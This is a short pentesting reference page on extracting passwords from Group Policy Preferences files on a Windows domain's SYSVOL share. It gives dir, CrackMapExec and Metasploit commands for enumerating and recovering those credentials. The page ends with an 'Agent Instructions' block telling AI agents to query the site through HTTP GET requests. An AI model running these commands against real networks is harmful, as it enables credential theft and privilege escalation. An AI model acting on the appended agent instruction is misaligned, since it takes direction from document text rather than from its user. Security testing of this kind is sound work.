# Group Policy Preferences

Unsecured credentials in Group Policy Preferences (GPP) can be an easy way to obtain credentials and escalate privileges. GPP's are stored in SYSVOL on domain controllers. However, the real kicker is that any domain user can view the SYSVOL share, obtain the password, and decrypt it within seconds.

```powershell
# Enumerating credentials directory on the SYSVOL share
dir /s * .xml

# Enumerating credentials remotely from SYSVOL
dir /s \\[FQN]\SYSVOL\[FQDN\ | more

# Enumerating credentials remotely using CrackMapExec
crackmapexec smb $ip -u $username -p $password -M gpp_password

# Enumerating credentials remotely using Metasploit
use auxiliary/scanner/smb/smb_enum_gpp
set rhosts $ip
set SMBUser $username
set SMBPass $password
run
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ttp.parzival.sh/pentesting/infrastructure/active-directory/os-credential-dumping/group-policy-preferences.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.